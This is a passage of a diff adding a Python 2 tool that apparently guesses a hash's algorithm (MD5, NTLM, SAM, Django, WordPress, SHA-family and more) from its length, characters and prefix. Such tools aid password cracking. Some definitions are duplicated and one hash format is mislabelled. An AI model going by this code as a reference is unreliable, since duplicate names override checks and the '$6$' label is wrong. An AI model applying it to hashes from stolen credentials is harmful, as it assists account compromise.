"106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); 